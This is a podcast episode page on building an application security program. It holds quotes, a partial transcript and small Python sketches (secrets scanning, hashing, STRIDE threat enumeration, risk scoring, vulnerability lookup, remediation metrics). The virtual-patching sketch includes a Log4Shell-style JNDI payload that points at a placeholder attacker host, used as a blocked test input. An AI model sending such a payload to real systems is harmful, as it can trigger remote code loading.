#138 - Building Application Security Program - Derek Fisher

 

   

“Building an application security program is about ensuring security is built into the software development lifecycle and knowing how to respond to vulnerabilities.”

Derek Fisher is the author of “Application Security Program Handbook”. In this episode, Derek shared about building an application security program and how to implement it in our organization. First, we discussed some fundamental security concepts, such as shift-left, the CIA triad, and threat modeling. Derek then outlined how to start an application security program and measure the program’s success. Derek also touched on the security program maturity model and gave his tips on how to build and hire application security teams. Towards the end, Derek gave his insights on how to address zero-day vulnerabilities when they emerge.

Listen out for:

  • Career Journey - [00:03:51]
  • Building Application Security Program - [00:06:56]
  • Shifting Left - [00:11:58]
  • CIA Triad - [00:16:30]
  • Threat Modeling - [00:19:04]
  • Threat Classification - [00:22:49]
  • Starting Application Security Program - [00:27:04]
  • Security Program Maturity Model - [00:32:45]
  • Building Security Teams - [00:35:27]
  • Measuring the Program’s Success - [00:40:19]
  • Zero Day Vulnerabilities - [00:42:48]
  • 3 Tech Lead Wisdom - [00:44:59]

_____

Derek Fisher’s Bio
Derek is an award-winning author of a children’s book series on cybersecurity as well as the author of “Application Security Program Handbook”. He is a university instructor at Temple University, where he teaches software development security to undergraduate and graduate students. He is a speaker on topics in the cybersecurity space and has led teams, large and small, at organizations in the healthcare and financial industries. He has built and matured information security teams as well as implemented organizational information security strategies to reduce the organization’s risk. His focus has been to raise the security awareness of the engineering organization while maintaining a practice of secure code development, delivery, and operations.

Follow Derek Fisher:

Mentions & Links:

 

Our Sponsor - Tech Lead Journal Shop
Are you looking for some cool new swag?

Tech Lead Journal now offers swag that you can purchase online. Each item is printed on demand based on your preference and will be delivered safely to you anywhere in the world where shipping is available.

Check out all the cool swag available by visiting techleadjournal.dev/shop. And don't forget to show it off once your order arrives.

 

Like this episode?
Follow @techleadjournal on LinkedIn, Twitter, Instagram.
Buy me a coffee or become a patron.

 

Quotes

Career Journey

  • We like to use the term shift left in cybersecurity. And I think if you’re gonna shift left, it doesn’t get any further left than that [children’s book].

  • [Alice Connected’s] a series, but it follows a couple of children as they get introduced to technology and some of the pitfalls that come with it: setting up a device securely, password hygiene, staying away from strangers, and playing games without getting scammed.

  • We look at the way we are in society today, and a lot of children of that age are obviously getting their own devices, if they’re not using their parents’. And so I think it’s important to try to impart some of those security concepts to them as early as possible.

Building Application Security Program

  • Every company is a software company, whether you’re actually developing software or just using it. All of us who work in the software space and understand how software gets made know that, at the very least, there are quality issues, if not security issues.

  • These companies that utilize that software will oftentimes collect data about their clients, about their customers, about their product. They may have IP that they’re trying to maintain. And all of this is being housed and utilized by the software that they bring into their organization. And it’s only getting more complex. When all of these different products talk to each other and integrate with each other and send data to and from each other, there’s opportunity there for weaknesses or vulnerabilities. And so that exposes the organization, exposes the data that they’re housing to malicious activity.

  • Even if your core competency is not software development and if your product isn’t in-house developed software, you still have exposure to this. And it’s critical to understand what are those vulnerabilities and how do you resolve those vulnerabilities when they are detected?

  • We are very good at being able to protect the perimeter. But that’s an old mentality, because things are shifting to the cloud and we’re using more SaaS tools, where things are decentralized and not housed within a data center. We understand where those entry points into our system are, and we understand the controls around them. But when your core competency is developing software and when your core product is an internally developed software product, it’s on that organization to ensure that we’re building security into that product and protecting the data that we’re collecting and using, in order to protect our clients.

  • Building an application security program is really about ensuring that security is built into that software development lifecycle. But not just into the software development lifecycle, but also how do we respond to vulnerabilities or findings as we move along that development pipeline all the way into the operational environment.

  • When you develop software and push it out into a production environment, that’s not where it ends. There’s constant iteration. You’re constantly getting feedback from your clients. You have defects that you have to resolve, and so forth. And those get pulled into the next set of requirements and development. Security is no different: when we find vulnerabilities in operations, or when we find new zero days and so forth, those things need to be pulled back into the development environment and resolved.

  • Having a program in place that is able to really look at that entire software development life cycle and integrate security as part of that entire cycle is what building an application security program is all about.

  • Traditionally, we always try to protect the perimeter, whether it’s in versus the out. And maybe it worked last time, but I guess these days, security threats have become much more sophisticated. Not to mention there might be also insider security threat.

  • These days, there are so many entry points where security vulnerabilities can be found. And even if you don’t change anything, you can still end up exposed. Think of the Log4j vulnerability: even though you didn’t change anything, you’re still exposed once that vulnerability is found.

Shifting Left

  • Today, if you look at discovering a vulnerability in the production environment, there’s a long path. There’s a path from the code being developed in a development environment, and then all the way to production. And there’s tools, there’s people, there’s processes that are all in place along that entire pipeline. All involved in the process of getting that code from a development environment into production.

  • And that’s a real cost. Think about a vulnerability going from the development environment into production: all along that pipeline, people have been involved with code that is potentially vulnerable, right up until it gets into that production environment. Then, when it’s discovered in production, you now have support individuals who have to get on bridge calls to figure out what the issue is. Security people are called in. You might have to pull in incident response and forensics. Depending on the severity of the vulnerability, you now have a very costly vulnerability.

  • The goal of shifting left and the goal of being able to push the discovery of that vulnerability earlier in the process is really about bringing security and detection as early into the process as possible. And the way we do that is through training developers to, number one, not release security vulnerabilities in the first place, or at least be able to understand the code patterns that result in secure software.

  • Additionally, try to layer in security scanning tools as early as possible. That could be things like static analysis software, or what we call SCA (Software Composition Analysis), to look for those vulnerabilities as early in the process as possible. Things like secrets management and secrets discovery tools [a minimal sketch of a secrets check follows these quotes]. All of these can be used early in the process to detect any potential security issues that could manifest in a production environment.

  • And then, all along that pipeline, you can also integrate other scanning tools that are designed for runtime environments, like dynamic scanners or interactive application security testing. So the goal there is to just continue to implement security tools along that path to discover those vulnerabilities before they get to a production environment.

  • As application security individuals, we’re starting to move away from the term shift left. Not that we don’t want to focus on discovering those vulnerabilities early, but we don’t want to forget that there are other methods of detecting vulnerabilities and ensuring that security is integrated across the entire life cycle.

  • We’re now trying to kind of overcorrect for the term shift left and pushing everything into the left-hand side of the development life cycle and sometimes forgetting about the rest of it.
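
To make the secrets-discovery idea above concrete, here is a minimal, self-contained sketch of the kind of check such a tool runs as an early pipeline gate. It is not any particular product’s implementation: the regex patterns, the directory walk, and the choice to fail the build on any hit are illustrative assumptions only.

```python
import re
import sys
from pathlib import Path

# Example patterns a secrets scanner might flag. The AWS access key ID
# format (AKIA + 16 uppercase alphanumerics) is well known; the generic
# "long literal assigned to a password-ish name" rule is a deliberately
# rough heuristic and will produce false positives.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "hardcoded_secret": re.compile(
        r"(?i)\b(password|passwd|secret|api_key)\s*[:=]\s*['\"][^'\"]{8,}['\"]"
    ),
}

def scan_file(path: Path) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) hits for one source file."""
    hits = []
    for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
        for rule, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, rule))
    return hits

if __name__ == "__main__":
    findings = []
    for path in Path(sys.argv[1] if len(sys.argv) > 1 else ".").rglob("*.py"):
        for lineno, rule in scan_file(path):
            findings.append(f"{path}:{lineno}: possible {rule}")
    print("\n".join(findings) or "no findings")
    # Failing the build on any finding is what makes this a shift-left gate.
    sys.exit(1 if findings else 0)
```

Wired into CI before review or merge, a check like this is about as far left as detection can go short of developer training.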

CIA Triad

  • It’s not just those three components. There are other acronyms that extend the CIA to also include things like authentication and accountability. But when you look at what we do from a security standpoint, it pretty much comes back to ensuring that data is secure and not exposed to somebody who shouldn’t see it, that the data is not corrupted and is known to be trusted, and that the data is available. The data and the systems are running the way they should be, and nothing has been tampered with in the system.

  • Just from a high level, with confidentiality, primarily we’re talking about encryption. Making sure that data is encrypted at rest, in transit, and in use. With integrity, we’re ensuring that we have hashing and checksums being used just to ensure that the data that was sent is the same data that was received. And with availability, you’re building highly redundant, highly available types of systems to ensure that when something is needed, it’s available.
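
As a small illustration of the integrity leg of the triad, the sketch below shows the hash-and-compare pattern described above, using Python’s standard hashlib; the payload values are made up for the example.

```python
import hashlib

def sha256_digest(data: bytes) -> str:
    """Return the hex SHA-256 digest used to verify integrity."""
    return hashlib.sha256(data).hexdigest()

# Sender side: compute a digest of the payload and transmit it alongside
# (in practice signed, HMAC'd, or sent over a trusted channel, so an
# attacker can't swap both payload and digest together).
payload = b'{"patient_id": 42, "dose_mg": 5}'
sent_digest = sha256_digest(payload)

# Receiver side: recompute and compare. A mismatch means the data was
# corrupted or tampered with in transit, i.e. integrity was lost.
received = b'{"patient_id": 42, "dose_mg": 50}'  # one flipped digit
assert sha256_digest(payload) == sent_digest      # intact copy verifies
assert sha256_digest(received) != sent_digest     # tampered copy does not
print("integrity check demonstrated")
```

In practice the digest itself has to be protected (signed, or exchanged over a trusted channel); otherwise an attacker who can tamper with the data can tamper with the checksum too.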

Threat Modeling

  • We do threat modeling on a daily basis, whether we know it or not. We get in our car and we start driving and our mind is already doing, whether we consciously think about it or not, we’re doing threat modeling. Am I going the right direction? Is there gonna be traffic? Is this person gonna stop at this stop sign that I’m about to go through? And you build in certain mitigations and you determine like whether you’re doing the right thing.

  • On a basic level, threat modeling is essentially asking what can go wrong. It ultimately comes down to asking that basic question, what can go wrong? And once you identify what that wrong is, you start developing those mitigations and remediation efforts.

  • If you want to get started with threat modeling, there are a couple of different tools that I usually recommend. One is the Microsoft Threat Modeling Tool, which is free to download. OWASP also has one called Threat Dragon, which is a threat model tool purpose-built for designing threat models. Other individuals and organizations will use things like PowerPoint or Visio.

  • Essentially, when you’re doing a threat model, you’re drawing out the architecture of the system. And you wanna understand what the different touchpoints are in that system, whether they’re third-party integrations, internal users, or external users. You wanna know basically what the attack surface looks like for that system.

  • And then start asking those questions on each one of those integration points. Ask the question, what can go wrong? Can somebody spoof this call? Can somebody tamper with the data that’s coming through? Can someone perform a denial of service? Can someone change their access level from a simple user to an admin user? And you go through that with each one of those interactions with the system.

  • And so that’s the basic process of threat modeling: drawing out that architecture, identifying the interaction points, asking what different attacks could be performed at each one, and then deciding what we’re gonna do about that. [A minimal sketch of this per-interaction questioning follows these quotes.]

  • There’s also what we would call a more manual threat model process, which is essentially getting a bunch of individuals into a room with a whiteboard and doing the same thing: you draw out the architecture and you start asking those questions.

  • When you look at doing a manual threat model on a whiteboard, it’s more time consuming. You can’t really take your whiteboard and check it into a repository somewhere. But you’re gonna tend to get better results in those manual threat model sessions, because you’re gonna get more collaborative responses from the people in that conversation. But it doesn’t scale as well. There are some tradeoffs but, again, it all comes down to asking that question: what can go wrong, and what are we gonna do about it?
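
The per-interaction questioning described above can be sketched as a simple loop over the attack surface. The system, its entry points, and the wording of the questions below are invented for illustration; the categories follow STRIDE, which is where the spoofing, tampering, denial-of-service, and elevation-of-privilege questions in these quotes come from.

```python
# A minimal, tool-agnostic sketch of "ask what can go wrong at every
# interaction point". The interaction points and mitigating decisions are
# hypothetical; the categories are the six STRIDE threat types.

STRIDE_QUESTIONS = {
    "Spoofing": "Can somebody fake the identity behind this call?",
    "Tampering": "Can somebody alter the data flowing through here?",
    "Repudiation": "Could someone deny having performed this action?",
    "Information disclosure": "Could data leak to someone who shouldn't see it?",
    "Denial of service": "Can somebody make this unavailable?",
    "Elevation of privilege": "Can a plain user become an admin here?",
}

# The attack surface: each external touchpoint of the (hypothetical) system.
interaction_points = [
    "browser -> public REST API",
    "REST API -> payments provider (third party)",
    "admin console -> user database",
]

def enumerate_threats(points):
    """Cross every interaction point with every STRIDE question."""
    for point in points:
        for category, question in STRIDE_QUESTIONS.items():
            yield point, category, question

for point, category, question in enumerate_threats(interaction_points):
    print(f"[{point}] {category}: {question}")
# Each printed line is a prompt for the room: decide whether the threat
# applies and, if so, record a mitigation or an explicitly accepted risk.
```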

Threat Classification

  • It comes down to understanding what the risk level or risk tolerances of the organization are. And that’s a very key component that I think we’re missing in many companies: how do you really know what the risk is of the findings that you find in your software? We don’t always do a good job of that.

  • If you’re working inside of an organization, you know what your flagship products are. You know where your crown jewels are in terms of data. You know what the critical workflows are and you can determine like, okay, well this vulnerability that we found impacts this application, has potential to compromise this data that’s high risk, so we should tackle that.

  • However, again, we’re not great at being able to make that decision quickly and in a very calculated way. It tends to be more of an individual call. I don’t wanna say a gut reaction, but it sort of is.

  • Risk really comes down to technical risk and business risk. There’s the technical risk: are we gonna lose confidentiality, the integrity of the data, or the availability of the system? And then, from the business side: do we have compliance concerns? Do we have contractual concerns? Do we have dollar amounts assigned to downtime for this application? Marrying those two together really gives you the overall risk of that vulnerability in the context of that application. [A simple scoring sketch follows these quotes.]

  • I think we’re kind of missing that context in a lot of organizations in terms of how do we frame those into those vulnerabilities that we find? How do we frame them into the right context so that we know what we’re tackling?

  • The other side of that, from a technical standpoint, is: what’s the exploitability of this vulnerability? And that’s another piece that we’re not, as an industry, great at getting to. Application security teams can find vulnerabilities all day. Penetration testers can find vulnerabilities all day too. We have no shortage of ability to find vulnerabilities. But are these really actual issues that we need to be concerned about? Are they gonna actually go into a production environment? If they go into that production environment, are they actually going to be exploited?

  • Because in any mature organization, you’re gonna have runtime protection, you’re gonna have segmentation, you’re gonna have all these other controls in place that may make that vulnerability unexploitable. Understanding how to prioritize vulnerabilities and understanding how to really contextualize them is not easy. It’s understanding what is the organization’s risk, what’s the exploitability of that vulnerability, and, you know, putting that together and making a decision quickly.
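
A toy example of marrying technical risk, business risk, and exploitability into a single prioritization order might look like the sketch below. The 1–5 scales, the factor names, and the scoring formula are assumptions made purely for illustration, not a standard; many teams anchor the technical side on CVSS and layer business context on top.

```python
from dataclasses import dataclass

@dataclass
class Finding:
    name: str
    technical_impact: int   # 1-5: loss of confidentiality/integrity/availability
    business_impact: int    # 1-5: compliance, contractual, downtime cost
    exploitability: int     # 1-5: 1 = blocked by existing controls, 5 = trivial to exploit

    @property
    def risk_score(self) -> float:
        # Impact is the worse of the technical and business views,
        # then scaled by how realistic exploitation actually is.
        return max(self.technical_impact, self.business_impact) * self.exploitability

# Hypothetical findings, as a scanner or pen test might report them.
findings = [
    Finding("SQL injection in flagship checkout flow", 5, 5, 4),
    Finding("Outdated library in internal batch job", 3, 2, 1),
    Finding("Verbose error page on marketing site", 2, 1, 3),
]

# Work the backlog from the top of this list, not in discovery order.
for f in sorted(findings, key=lambda f: f.risk_score, reverse=True):
    print(f"{f.risk_score:5.1f}  {f.name}")
```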

Starting Application Security Program

  • Securing the development life cycle can be done a hundred different ways. And there can be any combination of tools. And I think it really comes down to a few things.

  • One is, what’s the budget tolerance? If you’re on a shoestring budget and you don’t have a lot of cash to just throw at a problem, then you have to be creative. If you are less constrained in that area, then you can have a little bit more leeway in being able to build a more robust security development program.

  • At some point, finding more vulnerabilities isn’t making you more secure. In fact, it may mean you’re not gonna get invited to the Christmas party, because all you’re doing is finding more vulnerabilities and making everybody angry. So I think at some point, you have to go for quality over quantity.

  • It really does depend on the organization. What is the business budget tolerance? And what is your risk as an organization? If you’re a company that has no sensitive data, you are not processing credit cards, you’re not holding client data, there’s no sensitive information, you’re not gonna want to integrate all the security tools that Gartner puts out there and layer ‘em all into your development pipeline. But if you’re a large organization with high-risk data, high-risk workflows, then yeah, you’re gonna have a little different context.

  • The way I usually try to approach it is to think about what you are trying to discover. If you’re looking to discover vulnerabilities, the way to start is with those runtime types of tools, so DAST (Dynamic Application Security Testing) or IAST (Interactive Application Security Testing). The other thing is to get a penetration test. If you’re going to use a third party, that’s fine. If you have people in-house who can do it, that’s great.

  • You wanna find out what are our surface vulnerabilities that we need to be concerned about. Ones that would actually show up in an environment. And those tools, DAST and IAST and using a penetration testing engagement will help you get that information relatively quickly. But there are the concerns around scope. Like, do we get everything in the application? Are there any hidden corners that didn’t get caught by the scans?

  • And then SCA, software composition analysis. To me, it should always be integrated. It’s very low friction, usually low cost. There are open source tools out there that can help you. You can build your own based on some open APIs, for access to things like the NVD (National Vulnerability Database), to basically look at your libraries and understand which of them have known vulnerabilities that you need to replace. Set aside the code that we’re developing: the code that we’re pulling from repositories and third parties, is that vulnerable? Tools like SCA will certainly help with that. [A minimal lookup sketch follows these quotes.]

  • I think getting the surface level vulnerabilities and getting the vulnerabilities that exist in the libraries that you’re using are core application security planks, I would say, in terms of building a program.

  • And then you start turning the screws there a little bit, looking at static analysis, because those tools tend to be noisy and they tend to turn up a lot of findings. But you can integrate them into the development environment. And if you have them properly tuned, if you’re using a good tool, and if you have smart engineers and smart application security individuals, then you can get some value out of them and try to head things off before they go into a production environment.

  • Additionally, start looking at your security training program and making sure that engineers are getting the security training that will help them, again, avoid introducing those vulnerabilities.

  • And the last thing I would say is a security champions program, which is really a sign of a mature application security program when you’re firing up a champions program. Because that’s usually where the tools are integrated, you’re getting the vulnerabilities, now you need additional help in trying to resolve those vulnerabilities. And that’s kind of where a champions team comes in.

  • These days, I just want to highlight that we all use a lot of software that is open source or free to download. And it’s not just libraries or frameworks; sometimes it’s also container images, VM images, and things like that. There are so many things that people have built. I’m not saying that open source is not secure. But there are always points where hackers might include some kind of malicious software inside those open source tools. And hence, having SCA is actually very important.
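
As a minimal illustration of checking your libraries against an open vulnerability database, the sketch below queries the OSV.dev API rather than the NVD named above, simply because its request shape is compact; the endpoint and response fields are as publicly documented and should be treated as an assumption to verify, and the dependency list stands in for whatever a lockfile or manifest parser would produce.

```python
import json
import urllib.request

OSV_QUERY_URL = "https://api.osv.dev/v1/query"

# Hypothetical dependency list, e.g. parsed from a lockfile or POM.
dependencies = [
    {"name": "org.apache.logging.log4j:log4j-core", "ecosystem": "Maven", "version": "2.14.1"},
    {"name": "requests", "ecosystem": "PyPI", "version": "2.31.0"},
]

def known_vulnerabilities(dep: dict) -> list[str]:
    """Return advisory IDs recorded for this exact package version."""
    body = json.dumps({
        "version": dep["version"],
        "package": {"name": dep["name"], "ecosystem": dep["ecosystem"]},
    }).encode()
    req = urllib.request.Request(
        OSV_QUERY_URL, data=body, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        result = json.load(resp)
    return [v["id"] for v in result.get("vulns", [])]

for dep in dependencies:
    ids = known_vulnerabilities(dep)
    status = ", ".join(ids) if ids else "no known advisories"
    print(f'{dep["name"]} {dep["version"]}: {status}')
```

A real SCA tool does much more (transitive dependencies, version range matching, license checks), but the core loop is the same: for every component you ship, ask a vulnerability database what is already known to be wrong with it.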

Security Program Maturity Model

  • BSIMM (Building Security In Maturity Model) and SAMM (Software Assurance Maturity Model) are the two that probably come to mind for most people. And they’re two different ways of looking at a maturity model.

  • BSIMM is looking at other organizations, doing basically an assessment of each organization and saying, well, here’s where this organization is from a maturity standpoint. And you, as your organization, can then look at that and ask, where are we at? It’s essentially measuring yourself against your peers and understanding, for other organizations of my size in my industry, what are the one, two, three things that everybody in this category is doing? Am I doing those things? So that’s a good way of checking whether we’re doing the things that our peers are doing.

  • With OWASP SAMM, that’s more of a classic maturity model where, okay, here’s the level that you’re starting at and here are the things you need to do to get to level one. And then here are the things you need to do to get to level two, and so forth. And the goal there is to really look at those steps in the maturity model and having targets for where you want to be.

  • You may not have to be at the highest level of maturity. Again, it goes back to understanding what your organization does. If you’re not processing credit cards, if you’re not holding clients’ sensitive data, and you’re not a critical app, you don’t need to be at the highest level.

  • What that does is allow you to say: if we want to get to level two, here are the things we need to do. You build out a roadmap that says, here are the steps we’re gonna take to get to that level, and here’s the timeline we’re gonna follow to get there.

  • I think BSIMM is more valuable to me than SAMM. And the reason is that I wanna know what are the other organizations doing? Are we in line with that?

  • But sometimes just having conversations with your peers is just as relevant. When I’ve had conversations with peers, just trying to see what they’re doing compared to what I’m doing, we’ll kind of exchange notes.

Building Security Teams

  • The first thing to realize is you’re never gonna scale to what you need. Don’t even bother. It’s not possible.

  • I could double the size of my team and it probably still wouldn’t be sufficient. And a lot of it is because application security is very different from security operations centers, very different from network security, and so forth.

  • The way I always describe it is, application security teams are the sidecar to engineering. We are the ones that have to be part of that development process to ensure that security is integrated. Now that doesn’t mean it has to be an individual. And if it is an individual, it doesn’t have to be an application security individual, which is why things like champions programs or security education programs are very helpful in the sense that you’re helping to drive security education across the engineering organization.

  • But if you are tasked with building an application security team, it comes down to asking the question: what do we want to do? Do we want to just be a team of penetration testers? Do we want to be a team of engineers who work with the developers in engineering and help them create secure code? Do we just wanna integrate tools and do nothing other than integrate tools, find vulnerabilities, and tell somebody to go fix them? So it really comes down to understanding what your organization is going to tolerate and what the actual needs for the team are.

  • Every organization’s gonna have a different kind of view on that. And it really comes down to understanding what the budget tolerance is, what the need is from the organization’s perspective, and what the roadmap for the application security team is. Is it, again, just integrating tools and finding vulnerabilities? Do we wanna get more proactive in terms of blue teaming, purple teaming, and red teaming to discover those vulnerabilities? Or are we just gonna stick to architecture and design?

  • As for being able to hire the “right size” in terms of individuals: you’re not gonna do it.

  • I know BSIMM had some numbers around what the right size is. But again, it varies. It could be that for every hundred engineers you have one AppSec person, or one for every 50. It really depends on the organization.

  • When it comes down to hiring, one of the things that I typically look for is somebody who has some type of development background. Because if you can’t speak the language of the development team, then you’re already at a disadvantage. Not that you can’t be in application security otherwise; obviously, we have plenty of people in application security who didn’t come out of development. But it’s certainly helpful to have those individuals on your team, people who can really translate the vulnerabilities that come out of these tools and penetration testing, go back to the development team, and say, “Looking at your code, here’s exactly what the problem is and here’s exactly how you can resolve it.”

  • That goes a long way, not just in making the organization more secure and making the application more secure, but also building that relationship between the development team and the application security team where we both understand each other, therefore we’re on somewhat common ground there.

Measuring the Program’s Success

  • There are two main ones that I would focus on.

    • One is a downward trend in vulnerabilities, not an upward one.

      • We have no problem finding vulnerabilities. We can find them all day, every day. But it’s really, are we moving the needle and reducing that backlog? That to me is a better indicator of a security program where we’re reducing that backlog, not adding to it.

      • There have been times where we’ve had scans or tests done and there weren’t any vulnerabilities found. All of us in the security space, when we see a scan come back with no results, immediately go, wait a minute, that can’t be right. But as long as you can validate that, no, this is right, I think that’s a good indication as well that the program’s working. We’re not finding things as much. We’re not adding to the backlog; we’re reducing it.

    • The other thing is mean time to remediation.

      • How quickly are we resolving those vulnerabilities? Do we have vulnerabilities that are sitting out there for weeks, months, maybe even years?

      • If that’s the case, that’s a problem. Especially with very long-lasting vulnerabilities, ones open past several months or even a year or more, you have to ask the question: is this even still a valid issue? If something’s been out there that long, there’s something not right there.

      • Looking at the amount of time that it takes to actually remediate a vulnerability is also a critical indicator of how successful the program is. Because, again, we can find vulnerabilities all day. But if a critical vulnerability is found and we’re able to remediate that within a few hours or a day or two or something like that, that’s a very strong indicator that your program is humming along the way it should.
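
The two indicators above, the backlog trend and mean time to remediation, are straightforward to compute once findings carry open and close dates. A minimal sketch with invented records:

```python
from datetime import datetime

# Hypothetical findings; in practice these would come from your scanner
# or ticketing system, ideally segmented by severity.
vulns = [
    {"id": "VULN-101", "severity": "critical",
     "opened": "2024-03-01", "closed": "2024-03-02"},
    {"id": "VULN-102", "severity": "high",
     "opened": "2024-02-10", "closed": "2024-03-20"},
    {"id": "VULN-103", "severity": "high",
     "opened": "2024-01-05", "closed": None},   # still open: a backlog item
]

def days_open(record, as_of="2024-04-01"):
    """Days between opening and closing (or the reporting date if still open)."""
    opened = datetime.fromisoformat(record["opened"])
    closed = datetime.fromisoformat(record["closed"] or as_of)
    return (closed - opened).days

remediated = [v for v in vulns if v["closed"]]
mttr = sum(days_open(v) for v in remediated) / len(remediated)
backlog = [v["id"] for v in vulns if not v["closed"]]

print(f"mean time to remediation: {mttr:.1f} days over {len(remediated)} fixes")
print(f"open backlog: {backlog}")  # the other trend to watch: it should shrink
```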

Zero Day Vulnerabilities

  • I think that comes down to that mean time to remediation. Take the SCA example, software composition analysis. We can develop software and have zero vulnerabilities when that software goes out into production. The next day, some component that we pulled in from a repository could be vulnerable, whether it’s a zero day or an identified public vulnerability. Either way, it’s vulnerable, and you did everything right. Time will result in vulnerabilities being found.

  • It really comes down to having a process in place to take those vulnerabilities that have been discovered in a production environment and get a remediation out the door in a short period of time. That goes back to mean time to remediation: if we find an issue in production and we’re able to get a remediation pushed to production in a very short period of time, whether that’s hours, days, or a week or so, then great. That means your program is doing very well.

  • Runtime protection. There are tools out there, whether it’s a WAF (Web Application Firewall) or RASP (Runtime Application Self-Protection). Those also go a long way in providing some cover for a period of time until you can get that remediation out the door.

  • There are a lot of levers that we can pull from a security perspective to ensure that we are providing that protection against, especially things like zero days, where something like runtime protection does come into play. Because it allows you to do virtual patching and it allows you to potentially stop any malicious activity until you get the code out the door.
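
As a toy illustration of the virtual-patching idea, the sketch below rejects requests carrying the Log4Shell-style `${jndi:` lookup string mentioned earlier in the episode. A real WAF or RASP rule set handles encodings and obfuscation and sits in front of, or inside, the runtime rather than in application code, so treat this purely as a sketch of the concept.

```python
# Block a known exploit pattern at a runtime layer while the real code fix
# is being shipped. The single pattern and the dict-based request shape are
# simplifications for illustration.

BLOCKED_PATTERNS = ["${jndi:"]

def allow_request(headers: dict[str, str], params: dict[str, str]) -> bool:
    """Return False if any header or parameter carries a blocked pattern."""
    for value in list(headers.values()) + list(params.values()):
        lowered = value.lower()
        if any(p in lowered for p in BLOCKED_PATTERNS):
            return False  # drop or 403 the request, and log it for investigation
    return True

# Example: a scanner probing via the User-Agent header gets rejected,
# while a normal request passes through untouched.
probe = {"User-Agent": "${jndi:ldap://attacker.example/a}"}
normal = {"User-Agent": "Mozilla/5.0"}
print(allow_request(probe, {}))    # False
print(allow_request(normal, {}))   # True
```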

3 Tech Lead Wisdom

  1. Stay curious.

    • One thing with technology is that it’s always changing. And a prime example, everyone’s on the AI train right now where it’s everywhere. It’s inescapable and everyone’s trying to figure out what to do with it.

    • It’s an example of where technology’s always changing. One of the things with application security in general or more specifically is that we have to stay up to speed with what development’s doing.

    • The things that we were doing five years ago are vastly different than what we’re doing today. And so you have to be able to stay curious, stay engaged, and be able to know where the technology is heading.

  2. Be a mentor if you can, or be able to help others.

    • Especially in this space with security, there are a lot of openings and we’re having trouble filling them. I think we need help in this space. We definitely need people who want to get into security.

    • And I think being able to help mentor people and be able to bring them into this space is gonna help all of us. So find somebody that might be interested in security and try to help them along the way.

  3. Certifications aren’t always the answer.

    • I know that I could probably sit down and take a certification test today and pass it without studying, for many of them. That doesn’t mean that I’ve achieved anything.

    • I’m not saying certifications are wrong or anything like that, because there’s definitely value in certifications. I know a lot of organizations look specifically for certifications to make a hiring decision.

    • What I’ve often found is that I like studying for certifications, whether I take the exam or not, because I tend to learn from that. Especially in this space, we see a lot of people that just want to get into security and the first question is, which certification should I take? And it’s like, well, you don’t necessarily have to get a certification in order to get into this space.

    • Start dabbling, start getting involved. When you’re looking at application security specifically, start understanding how software is developed. Start understanding about CI/CD pipelines and integrating tools and how code gets delivered and deployed and maintained. If you’re looking into getting into other aspects of security, you know, start understanding those different corners and really, really understand it. Not just understand it enough to pass an exam.

Transcript

[00:00:56] Episode Introduction

Henry Suryawirawan: Hey, everyone. Welcome to the Tech Lead Journal podcast, the podcast where you can learn about technical leadership and excellence from my conversations with great thought leaders in the tech industry. If you haven’t, please follow the show on your podcast app and social media on LinkedIn, Twitter, and Instagram. For video contents, Tech Lead Journal is also now available on YouTube and TikTok. And if you want to support my work, buy me a coffee at techleadjournal.dev/tip or subscribe as a patron at techleadjournal.dev/patron.

My guest for today’s episode is Derek Fisher. Derek is the author of “Application Security Program Handbook” and also a security instructor at Temple University. In this episode, Derek shared about building an application security program and how to implement it in our organization.

First, we discussed some fundamental security concepts, such as shift-left, the CIA triad, and threat modeling. Derek then outlined how to start an application security program and measure the program’s success. Derek also touched on the security program maturity model and gave his tips on how to build and hire application security teams. Towards the end, Derek also gave his insights on how to address zero day vulnerabilities when they emerge.

I think we don’t need a reminder that security is very important to get right. And regardless of whether you’re building an application or just using one, there’s an inherent security risk in the technologies and software we use.

And I hope you enjoy listening to this episode and learning a few things about building an application security program. And if you do, it would be really awesome if you can share this with your colleagues, your friends, and communities, and also leave a five-star rating and review on Apple Podcasts and Spotify. It may sound simple, but it will help me a lot in getting more people to discover the podcast on the platforms. Let’s go to the conversation with Derek after our sponsor message.

[00:03:20] Introduction

Henry Suryawirawan: Hey, everyone! Welcome back to another new episode of the Tech Lead Journal. Today, I have with me a guest named Derek Fisher. He’s the author of a book titled “Application Security Program Handbook”. As you can tell from the title itself, we’ll be talking a lot about application security and how to build a program within your company or within your team in order to put security at the forefront of the software development that you do. So Derek, thank you so much for your time, and I’m looking forward to our discussion today.

Derek Fisher: Yeah. Thank you Henry. Thank you for having me on and looking forward to discussing this topic.

[00:03:51] Career Journey

Henry Suryawirawan: So, Derek, I always love to ask my guest to share about himself or herself first in the beginning. So maybe if you can spend a bit of time telling us who you are and what are the highlights or turning points that you think are worth sharing.

Derek Fisher: Yeah, so I’ve been in engineering for probably close to 30 years at this point. I started out in hardware engineering, actually designing circuit boards and working in mechanical engineering. I then moved on to software engineering after pursuing a Bachelor’s degree in computer science. And while I was working in software engineering, I got introduced to someone, a product security officer at Siemens, who then got me interested in cybersecurity, and I decided to pursue a Master’s degree in cybersecurity from Boston University at that point. Got into security engineering, security architecture, then started leading a team, and never looked back.

So, I currently run a product security function at a leading financial technology company. I teach software security at Temple University. As you know, I’ve written the book on building an application security program. And also have written several children’s books on cybersecurity as well. Try to stay active in the community. There’s always a lot going on. And I tend to keep myself busy. But it’s been a good journey.

Henry Suryawirawan: Before we actually go to your book, the Application Security Program Handbook, I’m interested that you said you also wrote a book for children about cybersecurity. Maybe you can tell us a little bit more about that book. What made you write a book, and what kind of content are you sharing with the kids here?

Derek Fisher: Yeah, I think we like to use the term shift left in cybersecurity. And I think if you’re gonna shift left, it doesn’t get any further left than that. So the reason I wrote it – it’s a series – but it follows a couple children as they get introduced to technology and some of the pitfalls that you have to deal with. Obviously, you know, being able to set up a device securely, password hygiene, staying away from strangers, using games and being able to not get scammed during games. So, you know, there’s a lot of different things. There’s, like I said, three books, so there’s a couple things, concepts that weave through those books.

